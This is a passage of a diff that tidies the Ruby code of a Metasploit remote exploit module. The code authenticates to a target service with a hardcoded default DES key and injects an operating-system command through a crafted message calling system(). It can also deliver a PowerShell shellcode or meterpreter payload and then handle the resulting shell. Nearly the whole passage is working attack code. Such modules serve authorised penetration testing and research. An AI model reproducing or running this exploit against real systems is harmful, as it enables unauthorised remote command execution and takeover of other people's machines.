ret_data = receive_msg - fail_with(Failure::UnexpectedReply, "Failed to receive session confirmation. Aborting.") if ret_data == $nil + fail_with(Failure::UnexpectedReply, "Failed to receive session confirmation. Aborting.") if ret_data.nil? - #Authenticate + # Authenticate authenticate_user(datastore['USER'], datastore['PASSWORD']) - #receive the authentication response + # Receive the authentication response ret_data = receive_msg - fail_with(Failure::UnexpectedReply, "Failed to receive authentication response. Aborting.") if ret_data == $nil + fail_with(Failure::UnexpectedReply, "Failed to receive authentication response. Aborting.") if ret_data.nil? ret_msg = process_response(ret_data) if ret_msg =~ /logged in/ @@ -276,49 +283,49 @@ class MetasploitModule < Msf::Exploit::Remote fail_with(Failure::UnexpectedReply, "Login failed. Aborting.") end - #receive the server info + # Receive the server info ret_data = receive_msg - fail_with(Failure::UnexpectedReply, "Failed to receive server info msg. Aborting.") if ret_data == $nil + fail_with(Failure::UnexpectedReply, "Failed to receive server info msg. Aborting.") if ret_data.nil? srv_info = process_response(ret_data) - #Get the target's OS from their info msg + # Get the target's OS from their info msg target_os = get_target_os(srv_info) - # When using auto targeting, MSF selects the Windows meterpreter as the default payload. + # When using autotargeting, MSF selects the Windows meterpreter as the default payload. # Fail if this is the case and ask the user to select an appropriate payload. - if target_os[0] == 'Linux' and payload_instance.name =~ /Windows/ and datastore['CMD'] == $nil + if target_os[0] == 'Linux' && payload_instance.name =~ /Windows/ && datastore['CMD'].nil? fail_with(Failure::BadConfig, "#{peer} - Select a compatible payload for this Linux target.") end target_name = target.name - if datastore['CMD'] != $nil + if !datastore['CMD'].nil? command = datastore['CMD'].tr('"', '\"') print_status("Command to execute: #{command}") elsif target_name == 'Windows Powershell Injected Shellcode' - #Get encoded powershell of payload + # Get encoded powershell of payload command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, method: 'reflection') else command = payload.raw.tr('"', '\"') end - #Run command + # Run command run_cmd(command) - #receive command confirmation + # Receive command confirmation ret_data = receive_msg - if ret_data != $nil + if !ret_data.nil? process_response(ret_data) end - #receive command output + # Receive command output ret_data = receive_msg - if ret_data != $nil && datastore['CMD'] != $nil - cmd_result_data = process_response( ret_data ) + if !ret_data.nil? && !datastore['CMD'].nil? + cmd_result_data = process_response(ret_data) cmd_result = get_cmd_output(cmd_result_data) - print_status( "Output:\n#{cmd_result}" ) + print_status("Output:\n#{cmd_result}") end - #Handle the shell + # Handle the shell handler end @@ -326,16 +333,16 @@ class MetasploitModule < Msf::Exploit::Remote def receive_msg header = sock.get_once(6) - if header == $nil + if header.nil? return end - payload_size_arr = header[0,4] - payload_size = payload_size_arr.unpack("N")[0] + payload_size_arr = header[0, 4] + payload_size = payload_size_arr.unpack1("N") payload = '' if payload_size > 0 payload = sock.get_once(payload_size) - if payload == $nil + if payload.nil? return end end @@ -349,31 +356,33 @@ class MetasploitModule < Msf::Exploit::Remote data_len = data.length buf = [data_len].pack('N') - #Set the type + # Set the type buf += [type].pack('C') - #Set compression flag + # Set compression flag buf += [compression].pack('C') - #Add data + # Add data buf += data - #Send msg + # Send msg sock.put(buf) end - def process_response( ret_data ) + def process_response(ret_data) - ret_size_arr = ret_data[0,4] - ret_size = ret_size_arr.unpack("N")[0] + # While style checks complain, I intend to leave this parsing + # in place for debugging purposes + ret_size_arr = ret_data[0, 4] + ret_size = ret_size_arr.unpack1("N") # rubocop:disable Lint/UselessAssignment - msg_type = ret_data[4,1] - comp_flag = ret_data[5,1] + msg_type = ret_data[4, 1] # rubocop:disable Lint/UselessAssignment + comp_flag = ret_data[5, 1] payload_data = ret_data[6..-1] if comp_flag == "\x00" - bin_data = payload_data.unpack("H*")[0] + bin_data = payload_data.unpack1("H*") # rubocop:disable Lint/UselessAssignment payload_data = @inflater.inflate(payload_data) end @@ -384,7 +393,7 @@ class MetasploitModule < Msf::Exploit::Remote def run_cmd(cmd) user_num = rand 1000..9999 - msg_1 = %Q(R_E + msg_1 = %(R_E { \tRE_ID=1 \tRE_PDESC=0\tRemPsl\tsystem("#{cmd}");\tRemPsl_user_#{user_num} @@ -396,48 +405,48 @@ class MetasploitModule < Msf::Exploit::Remote ) msg_1 += "\x00" - #Compress the message + # Compress the message comp_data = @deflater.deflate msg_1, Zlib::SYNC_FLUSH - send_msg( 0x44, 0x0, comp_data ) + send_msg(0x44, 0x0, comp_data) end - def identify( user ) + def identify(user) inner_len = 15 msg_type = 8 len_str = [inner_len].pack("N") msg_str = [msg_type].pack("N") - msg_1 = %Q(PEM_MSG + msg_1 = %(PEM_MSG { -\tNSDL=#{inner_len.to_s} +\tNSDL=#{inner_len} \tPEM_DGRAM=#{len_str}#{msg_str}#{user}\x00 } ) msg_1 += "\x00" - print_status( "Msg: #{msg_1}" ) - bin_data = msg_1.unpack("H*")[0] - #Compress the message + print_status("Msg: #{msg_1}") + bin_data = msg_1.unpack1("H*") # rubocop:disable Lint/UselessAssignment + # Compress the message comp_data = @deflater.deflate msg_1, Zlib::SYNC_FLUSH - send_msg( 0x44, 0x0, comp_data ) + send_msg(0x44, 0x0, comp_data) end - def create_session() + def create_session sess_msg = "\x00\x00\x00\x00\x00\x00\x00\x00\x05\x02\x00\x04\x02\x04\x03\x10\x00\x00\x03\x04\x00\x00\x00\x00\x01\x01\x04\x00\xff\x00\x00\x00" sess_msg += "\x00" * 0x68 - send_msg( 0x45, 0x2, sess_msg ) + send_msg(0x45, 0x2, sess_msg) end - def authenticate_user( user, password ) - #Default encryption key + def authenticate_user(user, password) + # Default encryption key enc_key = 'k$C4}@"_' - output_data = des_crypt_func( password, enc_key, DES_ENCRYPT) - #Convert to hex string - encrpted_pw = output_data.unpack("H*")[0] + output_data = des_crypt_func(password, enc_key, DES_ENCRYPT) + # Convert to hex string + encrpted_pw = output_data.unpack1("H*") des_pw = encrpted_pw.upcase - msg_1 = %Q(ID + msg_1 = %(ID { \tHOST=user \tUSER=#{user} @@ -452,11 +461,11 @@ class MetasploitModule < Msf::Exploit::Remote msg_1 += "\x00" comp_data = @deflater.deflate msg_1, Zlib::SYNC_FLUSH - send_msg( 0x44, 0x0, comp_data ) + send_msg(0x44, 0x0, comp_data) end - def rotate_block_init( input_block_tuple ) + def rotate_block_init(input_block_tuple) v6 = 0 v5 = 0 @@ -657,14 +666,14 @@ class MetasploitModule < Msf::Exploit::Remote v6 |= 0x80000000 end - #Create return tuple + # Create return tuple ret_block = Array.new ret_block.push v5 ret_block.push v6 ret_block end - def rotate_block_final( input_block_tuple ) + def rotate_block_final(input_block_tuple) v6 = 0 v5 = 0 @@ -865,31 +874,30 @@ class MetasploitModule < Msf::Exploit::Remote v6 |= 0x80000000 end - #Create return tuple + # Create return tuple ret_block = Array.new ret_block.push v5 ret_block.push v6 ret_block end - def load( a1 ) - - a2 = Array.new(8,0) + def load(a1) + a2 = Array.new(8, 0) v3 = a1 a2[0] = a1 & 0xff - v3 >>= 3; + v3 >>= 3 a2[1] = v3 & 0xff - v3 >>= 4; + v3 >>= 4 a2[2] = v3 & 0xff - v3 >>= 4; + v3 >>= 4 a2[3] = v3 & 0xff - v3 >>= 4; + v3 >>= 4 a2[4] = v3 & 0xff - v3 >>= 4; + v3 >>= 4 a2[5] = v3 & 0xff - v3 >>= 4; + v3 >>= 4 a2[6] = v3 & 0xff - v3 >>= 4; + v3 >>= 4 a2[7] = v3 & 0xff a2[0] = (a2[0] * 2) & 0xff a2[7] |= (16 * a2[0]) & 0xff @@ -900,56 +908,51 @@ class MetasploitModule < Msf::Exploit::Remote data_block[0] &= 0x3F3F3F3F data_block[1] &= 0x3F3F3F3F data_block - end - - def desx( data_block, ksch, idx) - + def desx(data_block, ksch, idx) ksch = ksch.pack("V*") ksch = ksch.unpack("Q<*") key_block = ksch[idx] data_block_ptr = data_block.pack("V*") - data_block_ptr = data_block_ptr.unpack("Q<*")[0] + data_block_ptr = data_block_ptr.unpack1("Q<*") data_block_ptr ^= key_block - right = 0 - left = 0 counter = 1 data_block_byte_ptr = [data_block_ptr].pack('Q<') left = SBOXES[data_block_byte_ptr[0].ord] right = SBOXES[data_block_byte_ptr[0].ord + (counter << 6)] - counter+=1 + counter += 1 left ^= SBOXES[data_block_byte_ptr[1].ord + (counter << 6)] - counter+=1 + counter += 1 right ^= SBOXES[data_block_byte_ptr[1].ord + (counter << 6)] - counter+=1 + counter += 1 left ^= SBOXES[data_block_byte_ptr[2].ord + (counter << 6)] - counter+=1 + counter += 1 right ^= SBOXES[data_block_byte_ptr[2].ord + (counter << 6)] - counter+=1 + counter += 1 left ^= SBOXES[data_block_byte_ptr[3].ord + (counter << 6)] - counter+=1 + counter += 1 right ^= SBOXES[data_block_byte_ptr[3].ord + (counter << 6)] - counter+=1 + counter += 1 left ^= SBOXES[data_block_byte_ptr[4].ord + (counter << 6)] - counter+=1 + counter += 1 right ^= SBOXES[data_block_byte_ptr[4].ord + (counter << 6)] - counter+=1 + counter += 1 left ^= SBOXES[data_block_byte_ptr[5].ord + (counter << 6)] - counter+=1 + counter += 1 right ^= SBOXES[data_block_byte_ptr[5].ord + (counter << 6)] - counter+=1 + counter += 1 left ^= SBOXES[data_block_byte_ptr[6].ord + (counter << 6)] - counter+=1 + counter += 1 right ^= SBOXES[data_block_byte_ptr[6].ord + (counter << 6)] - counter+=1 + counter += 1 left ^= SBOXES[data_block_byte_ptr[7].ord + (counter << 6)] - counter+=1 + counter += 1 right ^= SBOXES[data_block_byte_ptr[7].ord + (counter << 6)] - #Create return tuple + # Create return tuple ret_block = Array.new ret_block.push left ret_block.push right @@ -957,67 +960,66 @@ class MetasploitModule < Msf::Exploit::Remote end - def store( data_block ) + def store(data_block) a1 = data_block.pack("V*") - val = 8 * (16 * (16 * (16 * (16 * (16 * (16 * a1[7].ord | a1[6].ord) | a1[5].ord) | a1[4].ord) | a1[3].ord) | a1[2].ord) | a1[1].ord) | a1[0].ord >> 1; - val = val & 0xffffffff + val = 8 * (16 * (16 * (16 * (16 * (16 * (16 * a1[7].ord | a1[6].ord) | a1[5].ord) | a1[4].ord) | a1[3].ord) | a1[2].ord) | a1[1].ord) | a1[0].ord >> 1 + val & 0xffffffff end - def sbox_xors( data_block_in, ksch_arg, decrypt_flag) + def sbox_xors(data_block_in, ksch_arg, decrypt_flag) decrypt_flag_cpy = decrypt_flag if (decrypt_flag & 0x100) != 0 data_block_0 = data_block_in else - data_block_0 = rotate_block_init( data_block_in ) + data_block_0 = rotate_block_init(data_block_in) end - #puts data_block_0 encrypt_flag = (decrypt_flag_cpy & 1) == 0 - ti_block_0 = load( data_block_0[0] ) - ti_block_1 = load( data_block_0[1] ) + ti_block_0 = load(data_block_0[0]) + ti_block_1 = load(data_block_0[1]) for i in 0..15 ti_cpy = ti_block_1 if encrypt_flag - ti_block_1 = desx( ti_block_1, ksch_arg, i ) + ti_block_1 = desx(ti_block_1, ksch_arg, i) else - ti_block_1 = desx( ti_block_1, ksch_arg, 15 - i ) + ti_block_1 = desx(ti_block_1, ksch_arg, 15 - i) end ti_block_1[0] ^= ti_block_0[0] ti_block_1[1] ^= ti_block_0[1] ti_block_0 = ti_cpy end - data_block_0[0] = store( ti_block_1 ) - data_block_0[1] = store( ti_block_0 ) + data_block_0[0] = store(ti_block_1) + data_block_0[1] = store(ti_block_0) - if (!(decrypt_flag_cpy & 0x200) != 0 ) - rotate_block_final( data_block_0 ) + if (!(decrypt_flag_cpy & 0x200) != 0) + rotate_block_final(data_block_0) else data_block_0 end end - def set_key_unchecked( key ) + def gen_key_unchecked(key) idx = 0 key_arr = key.unpack("V*") key_sch = Array.new - for i in 0..15 + for i in 0..15 idx += ROTATIONS[i].ord - v6 = 0; - v5 = 0; - v14 = 0; + v6 = 0 + v5 = 0 + v14 = 0 for j in 0..47 - pc2_p1 = ( idx + PC2[j].ord ) % 0x1C + pc2_p1 = (idx + PC2[j].ord) % 0x1C if PC2[j].ord > 0x1B pc2_p2 = 0x1c else pc2_p2 = 0 end - v13 = PC1[ pc2_p1 + pc2_p2 ].ord + v13 = PC1[pc2_p1 + pc2_p2].ord if v13 <= 31 v12 = 0 else @@ -1033,7 +1035,7 @@ class MetasploitModule < Msf::Exploit::Remote v11 = 8 * (v10 / 6) + v10 % 6 key_and = key_arr[v12] & SBOX_BYTE_ORDER[v13] - if ( key_and != 0) + if (key_and != 0) if v14 == 1 v6 |= SBOX_BYTE_ORDER[v11] else @@ -1047,17 +1049,17 @@ class MetasploitModule < Msf::Exploit::Remote key_sch end - def des_string_to_key( key_buf_str ) + def des_string_to_key(key_buf_str) - des_keysch_0 = set_key_unchecked(INIT_DES_KEY_0) - des_keysch_1 = set_key_unchecked(INIT_DES_KEY_1) + des_keysch_0 = gen_key_unchecked(INIT_DES_KEY_0) + des_keysch_1 = gen_key_unchecked(INIT_DES_KEY_1) - temp_key1 = Array.new(8,0) - temp_key2 = Array.new(8,0) + temp_key1 = Array.new(8, 0) + temp_key2 = Array.new(8, 0) key_buf_bytes = key_buf_str.unpack("c*") - counter = 0; + counter = 0 key_buf_str_len = key_buf_bytes.length - 1 for i in 0..key_buf_str_len counter %= 8 @@ -1074,18 +1076,15 @@ class MetasploitModule < Msf::Exploit::Remote counter += 1 end - data_block = temp_key1.pack("c*").unpack("V*") - data_block = temp_key2.pack("c*").unpack("V*") - - #Prepare return array - ret_key = Array.new(8,0) + # Prepare the return array + ret_key = Array.new(8, 0) for j in 0..7 ret_key[j] = temp_key2[j] ^ temp_key1[j] end ret_key.pack("c*") end - def des_cbc( input_buf, buf_len, key_sch, iv, decrypt_flag ) + def des_cbc(input_buf, key_sch, iv, decrypt_flag) output_block_arr = Array.new blocks = input_buf.unpack("Q<*") @@ -1099,16 +1098,14 @@ class MetasploitModule < Msf::Exploit::Remote end current_block_tuple = [current_block].pack("Q<").unpack("V*") - output_block_tuple = sbox_xors( current_block_tuple, key_sch, decrypt_flag) - output_block = output_block_tuple.pack("V*").unpack("Q<")[0] + output_block_tuple = sbox_xors(current_block_tuple, key_sch, decrypt_flag) + output_block = output_block_tuple.pack("V*").unpack1("Q<") output_block_arr.push output_block if decrypt_flag == 1 output_block ^= iv - result = cur_block iv = cur_block else - result = output_block iv = output_block end end @@ -1117,17 +1114,11 @@ class MetasploitModule < Msf::Exploit::Remote end - def des_crypt_func( binary_buf, key_buf, decrypt_flag ) + def des_crypt_func(binary_buf, key_buf, decrypt_flag) des_key = des_string_to_key(key_buf) - des_keysch = set_key_unchecked( des_key ) + des_keysch = gen_key_unchecked(des_key) - bin_buf_len = binary_buf.length - if decrypt_flag == 1 - v13 = ((binary_buf.length + 8) & 0xFFFFFFFFFFFFFFF8) - 1 - bin_buf_len = v13 + 1 - end - - temp_enc_buf = Array.new( 8 * ((binary_buf.length + 7) >> 3) + 8, 0) + temp_enc_buf = Array.new(8 * ((binary_buf.length + 7) >> 3) + 8, 0) binary_buf_str = binary_buf.unpack('c*') for j in 0..binary_buf_str.length - 1 @@ -1135,8 +1126,7 @@ class MetasploitModule < Msf::Exploit::Remote end temp_enc_buf = temp_enc_buf.pack('c*') - pw_len_shift = (bin_buf_len + 7) >> 3 - output_buf = des_cbc( temp_enc_buf, 8 * pw_len_shift, des_keysch, 0, decrypt_flag) + output_buf = des_cbc(temp_enc_buf, des_keysch, 0, decrypt_flag) output_buf end